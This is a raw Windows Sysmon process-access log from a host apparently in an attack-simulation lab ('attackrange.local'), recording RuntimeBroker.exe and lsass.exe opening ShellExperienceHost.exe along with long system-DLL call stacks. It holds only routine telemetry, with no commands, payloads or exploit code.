12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000010789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a2f8d|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.411{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca332|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5356|C:\Windows\System32\Windows.Storage.dll+2a2eef|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000010787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c63|C:\Windows\System32\Windows.Storage.dll+e73d5|C:\Windows\System32\Windows.Storage.dll+e72e9|C:\Windows\System32\Windows.Storage.dll+e7282|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000010786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000010785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12ac55|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac29|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000010783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.332{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd39|C:\Windows\System32\Windows.Storage.dll+dbb65|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
